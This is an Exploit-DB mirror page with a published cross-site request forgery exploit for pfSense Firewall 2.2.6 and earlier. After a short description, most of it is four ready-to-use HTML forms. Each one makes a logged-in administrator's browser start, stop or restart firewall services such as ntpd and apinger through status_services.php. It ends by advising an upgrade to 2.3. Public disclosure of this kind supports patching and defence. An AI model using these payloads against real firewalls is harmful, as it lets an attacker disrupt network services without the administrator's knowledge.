exploit-db-mirror/platforms/php/webapps/39695.txt
Offensive Security b185ddf9b2 DB: 2016-04-15
6 new exploits

RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities
Microsoft Office Excel Out-of-Bounds Read Remote Code Execution (MS16-042)
pfSense Firewall <= 2.2.6 - Services CSRF
Brickcom Corporation Network Cameras - Multiple Vulnerabilities
PHPmongoDB 1.0.0 - Multiple Vulnerabilities
Internet Explorer 9_ 10_ 11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)
2016-04-15 05:03:51 +00:00

77 lines
No EOL
2.1 KiB
Text
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: pfSense Firewall <= 2.2.6 Cross-Site Request Forgery
# Exploit Author: Aatif Shahdad
# Software Link: http://files.nyi.pfsense.org/mirror/downloads/old/pfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz
# Version: 2.2.6 and below.
# Contact: https://twitter.com/61617469665f736
# Category: webapps
1. Description
An attacker can coerce a logged-in victim's browser to issue requests that will start/stop/restart services on the Firewall.
2. Proof of Concept
Login to the Web Console, for example, http://192.168.0.1 (set at the time of install) and open the following POCs:
Start NTPD service:
<html>
<body>
<form action="https://192.168.0.1/status_services.php">
<input type="hidden" name="mode" value="startservice" />
<input type="hidden" name="service" value="ntpd" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Stop NTPD service:
<html>
<body>
<form action="https://192.168.0.1/status_services.php">
<input type="hidden" name="mode" value="stopservice" />
<input type="hidden" name="service" value="ntpd" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Restart NTPD service:
POC:
<html>
<body>
<form action="https://192.168.0.1/status_services.php">
<input type="hidden" name="mode" value="restartservice" />
<input type="hidden" name="service" value="ntpd" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
The service will automatically start/stop.
Note: That NTPD service can be replaced with any service running on the Firewall. For example, to stop the APINGER (gateway monitoring daemon) service, use the following POC:
<html>
<body>
<form action="https://192.168.0.1/status_services.php">
<input type="hidden" name="mode" value="stopservice" />
<input type="hidden" name="service" value="apinger" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
3. Solution:
Upgrade to version 2.3 at https://www.pfsense.org/download/mirror.php?section=downloads